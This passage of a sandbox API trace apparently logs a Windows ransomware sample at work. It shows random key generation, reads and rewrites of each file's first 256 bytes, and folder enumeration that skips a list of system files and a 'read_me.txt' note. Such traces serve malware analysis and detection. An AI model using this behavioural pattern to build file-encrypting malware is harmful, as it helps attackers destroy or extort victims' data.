hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.816] GetProcessHeap () returned 0x4f10000 [0078.816] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0078.816] GetProcessHeap () returned 0x4f10000 [0078.816] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0078.816] GetProcessHeap () returned 0x4f10000 [0078.816] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0078.816] GetProcessHeap () returned 0x4f10000 [0078.816] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0078.816] GetProcessHeap () returned 0x4f10000 [0078.816] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f980 [0078.816] GetProcessHeap () returned 0x4f10000 [0078.816] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0078.816] GetProcessHeap () returned 0x4f10000 [0078.816] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.816] GetProcessHeap () returned 0x4f10000 [0078.816] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f980 | out: hHeap=0x4f10000) returned 1 [0078.816] GetProcessHeap () returned 0x4f10000 [0078.816] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.817] GetProcessHeap () returned 0x4f10000 [0078.817] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.817] GetProcessHeap () returned 0x4f10000 [0078.817] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.817] GetProcessHeap () returned 0x4f10000 [0078.817] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.817] GetProcessHeap () returned 0x4f10000 [0078.817] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.817] GetProcessHeap () returned 0x4f10000 [0078.817] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.817] GetProcessHeap () returned 0x4f10000 [0078.817] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.817] GetProcessHeap () returned 0x4f10000 [0078.817] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.817] GetProcessHeap () returned 0x4f10000 [0078.817] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.817] GetProcessHeap () returned 0x4f10000 [0078.817] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.817] GetProcessHeap () returned 0x4f10000 [0078.817] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.817] GetProcessHeap () returned 0x4f10000 [0078.817] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.817] GetProcessHeap () returned 0x4f10000 [0078.817] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.817] GetProcessHeap () returned 0x4f10000 [0078.817] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.817] GetProcessHeap () returned 0x4f10000 [0078.817] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.818] GetProcessHeap () returned 0x4f10000 [0078.818] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.818] GetProcessHeap () returned 0x4f10000 [0078.818] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.818] GetProcessHeap () returned 0x4f10000 [0078.818] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.818] GetProcessHeap () returned 0x4f10000 [0078.818] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.818] GetProcessHeap () returned 0x4f10000 [0078.818] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.818] GetProcessHeap () returned 0x4f10000 [0078.818] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.818] GetProcessHeap () returned 0x4f10000 [0078.818] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.818] GetProcessHeap () returned 0x4f10000 [0078.818] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.818] GetProcessHeap () returned 0x4f10000 [0078.818] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.818] GetProcessHeap () returned 0x4f10000 [0078.818] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0078.818] GetProcessHeap () returned 0x4f10000 [0078.818] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.818] GetProcessHeap () returned 0x4f10000 [0078.818] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0078.818] GetProcessHeap () returned 0x4f10000 [0078.818] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d560a0 | out: hHeap=0x4f10000) returned 1 [0078.818] GetProcessHeap () returned 0x4f10000 [0078.818] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0078.818] GetProcessHeap () returned 0x4f10000 [0078.818] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0078.818] SetFilePointerEx (in: hFile=0x804, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.819] WriteFile (in: hFile=0x804, lpBuffer=0x7d7f878*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f878*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0078.819] WriteFile (in: hFile=0x804, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0078.819] GetProcessHeap () returned 0x4f10000 [0078.819] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0078.819] GetProcessHeap () returned 0x4f10000 [0078.819] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0078.819] GetProcessHeap () returned 0x4f10000 [0078.819] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0078.819] CloseHandle (hObject=0x804) returned 1 [0078.820] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 36 [0082.992] SetFilePointerEx (in: hFile=0x7a8, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.992] ReadFile (in: hFile=0x7a8, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0082.992] SetFilePointerEx (in: hFile=0x7a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.992] GetProcessHeap () returned 0x4f10000 [0082.992] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0082.992] GetProcessHeap () returned 0x4f10000 [0082.992] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56528 [0082.992] SystemFunction036 (in: RandomBuffer=0x7d56528, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56528) returned 1 [0082.992] GetProcessHeap () returned 0x4f10000 [0082.992] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0082.993] ReadFile (in: hFile=0x7a8, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0082.993] GetProcessHeap () returned 0x4f10000 [0082.993] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0082.993] GetProcessHeap () returned 0x4f10000 [0082.993] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.993] GetProcessHeap () returned 0x4f10000 [0082.993] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0082.993] GetProcessHeap () returned 0x4f10000 [0082.993] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.993] GetProcessHeap () returned 0x4f10000 [0082.993] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d560a0 [0082.993] GetProcessHeap () returned 0x4f10000 [0082.993] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.993] GetProcessHeap () returned 0x4f10000 [0082.993] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.993] GetProcessHeap () returned 0x4f10000 [0082.993] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.993] GetProcessHeap () returned 0x4f10000 [0082.993] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.993] GetProcessHeap () returned 0x4f10000 [0082.993] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.993] GetProcessHeap () returned 0x4f10000 [0082.993] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.993] GetProcessHeap () returned 0x4f10000 [0082.993] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.993] GetProcessHeap () returned 0x4f10000 [0082.993] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.993] GetProcessHeap () returned 0x4f10000 [0082.993] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.993] GetProcessHeap () returned 0x4f10000 [0082.993] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.993] GetProcessHeap () returned 0x4f10000 [0082.993] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.993] GetProcessHeap () returned 0x4f10000 [0082.993] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.993] GetProcessHeap () returned 0x4f10000 [0082.993] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.994] GetProcessHeap () returned 0x4f10000 [0082.994] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.994] GetProcessHeap () returned 0x4f10000 [0082.994] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.994] GetProcessHeap () returned 0x4f10000 [0082.994] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.994] GetProcessHeap () returned 0x4f10000 [0082.994] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.994] GetProcessHeap () returned 0x4f10000 [0082.994] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.994] GetProcessHeap () returned 0x4f10000 [0082.994] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.994] GetProcessHeap () returned 0x4f10000 [0082.994] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.994] GetProcessHeap () returned 0x4f10000 [0083.028] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.028] GetProcessHeap () returned 0x4f10000 [0083.028] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.028] GetProcessHeap () returned 0x4f10000 [0083.028] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.028] GetProcessHeap () returned 0x4f10000 [0083.028] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.028] GetProcessHeap () returned 0x4f10000 [0083.028] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.028] GetProcessHeap () returned 0x4f10000 [0083.028] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.028] GetProcessHeap () returned 0x4f10000 [0083.028] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.028] GetProcessHeap () returned 0x4f10000 [0083.028] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.028] GetProcessHeap () returned 0x4f10000 [0083.029] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.029] GetProcessHeap () returned 0x4f10000 [0083.029] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.029] GetProcessHeap () returned 0x4f10000 [0083.029] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.029] GetProcessHeap () returned 0x4f10000 [0083.029] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.029] GetProcessHeap () returned 0x4f10000 [0083.029] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.029] GetProcessHeap () returned 0x4f10000 [0083.029] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0083.029] GetProcessHeap () returned 0x4f10000 [0083.029] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.029] GetProcessHeap () returned 0x4f10000 [0083.029] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0083.029] GetProcessHeap () returned 0x4f10000 [0083.029] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0083.029] GetProcessHeap () returned 0x4f10000 [0083.029] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0083.029] GetProcessHeap () returned 0x4f10000 [0083.029] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0083.029] GetProcessHeap () returned 0x4f10000 [0083.029] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f980 [0083.029] GetProcessHeap () returned 0x4f10000 [0083.029] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0083.029] GetProcessHeap () returned 0x4f10000 [0083.029] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.029] GetProcessHeap () returned 0x4f10000 [0083.029] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f980 | out: hHeap=0x4f10000) returned 1 [0083.029] GetProcessHeap () returned 0x4f10000 [0083.029] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.029] GetProcessHeap () returned 0x4f10000 [0083.029] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.029] GetProcessHeap () returned 0x4f10000 [0083.029] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.029] GetProcessHeap () returned 0x4f10000 [0083.030] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.030] GetProcessHeap () returned 0x4f10000 [0083.030] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.030] GetProcessHeap () returned 0x4f10000 [0083.030] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.030] GetProcessHeap () returned 0x4f10000 [0083.030] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.030] GetProcessHeap () returned 0x4f10000 [0083.030] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.030] GetProcessHeap () returned 0x4f10000 [0083.030] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.030] GetProcessHeap () returned 0x4f10000 [0083.030] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.030] GetProcessHeap () returned 0x4f10000 [0083.030] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.030] GetProcessHeap () returned 0x4f10000 [0083.030] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.030] GetProcessHeap () returned 0x4f10000 [0083.030] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.030] GetProcessHeap () returned 0x4f10000 [0083.030] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.030] GetProcessHeap () returned 0x4f10000 [0083.030] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.030] GetProcessHeap () returned 0x4f10000 [0083.030] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.030] GetProcessHeap () returned 0x4f10000 [0083.030] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.030] GetProcessHeap () returned 0x4f10000 [0083.030] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.031] GetProcessHeap () returned 0x4f10000 [0083.031] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.031] GetProcessHeap () returned 0x4f10000 [0083.031] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.031] GetProcessHeap () returned 0x4f10000 [0083.031] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.031] GetProcessHeap () returned 0x4f10000 [0083.031] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.031] GetProcessHeap () returned 0x4f10000 [0083.031] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.031] GetProcessHeap () returned 0x4f10000 [0083.031] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.031] GetProcessHeap () returned 0x4f10000 [0083.031] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0083.031] GetProcessHeap () returned 0x4f10000 [0083.031] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.031] GetProcessHeap () returned 0x4f10000 [0083.031] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0083.031] GetProcessHeap () returned 0x4f10000 [0083.031] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d560a0 | out: hHeap=0x4f10000) returned 1 [0083.031] GetProcessHeap () returned 0x4f10000 [0083.031] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.031] GetProcessHeap () returned 0x4f10000 [0083.031] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0083.031] SetFilePointerEx (in: hFile=0x7a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.031] WriteFile (in: hFile=0x7a8, lpBuffer=0x7d7f878*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f878*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0083.032] WriteFile (in: hFile=0x7a8, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0083.032] GetProcessHeap () returned 0x4f10000 [0083.032] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0083.032] GetProcessHeap () returned 0x4f10000 [0083.032] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0083.032] GetProcessHeap () returned 0x4f10000 [0083.032] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0083.032] CloseHandle (hObject=0x7a8) returned 1 [0083.033] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 93 [0083.075] GetProcessHeap () returned 0x4f10000 [0083.075] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c20008 [0083.075] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\*") returned 31 [0083.075] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24e61ae0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24e61ae0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName=".", cAlternateFileName="")) returned 0x7cfe768 [0083.075] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\.") returned 31 [0083.075] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24e61ae0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24e61ae0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="..", cAlternateFileName="")) returned 1 [0083.075] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\..") returned 32 [0083.075] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0083.075] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact") returned 51 [0083.075] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0083.075] StrStrW (lpFirst="administrator.contact", lpSrch="read_me.txt") returned 0x0 [0083.076] StrStrW (lpFirst="administrator.contact", lpSrch="autoexec.bat") returned 0x0 [0083.076] StrStrW (lpFirst="administrator.contact", lpSrch="desktop.ini") returned 0x0 [0083.076] StrStrW (lpFirst="administrator.contact", lpSrch="autorun.inf") returned 0x0 [0083.076] StrStrW (lpFirst="administrator.contact", lpSrch="ntuser.dat") returned 0x0 [0083.076] StrStrW (lpFirst="administrator.contact", lpSrch="iconcache.db") returned 0x0 [0083.076] StrStrW (lpFirst="administrator.contact", lpSrch="bootsect.bak") returned 0x0 [0083.076] StrStrW (lpFirst="administrator.contact", lpSrch="boot.ini") returned 0x0 [0083.076] StrStrW (lpFirst="administrator.contact", lpSrch="ntuser.dat.log") returned 0x0 [0083.076] StrStrW (lpFirst="administrator.contact", lpSrch="thumbs.db") returned 0x0 [0083.076] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 212 [0083.076] QueueUserWorkItem (Function=0x404e00, Context=0x7a8, Flags=0x0) returned 1 [0083.076] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, 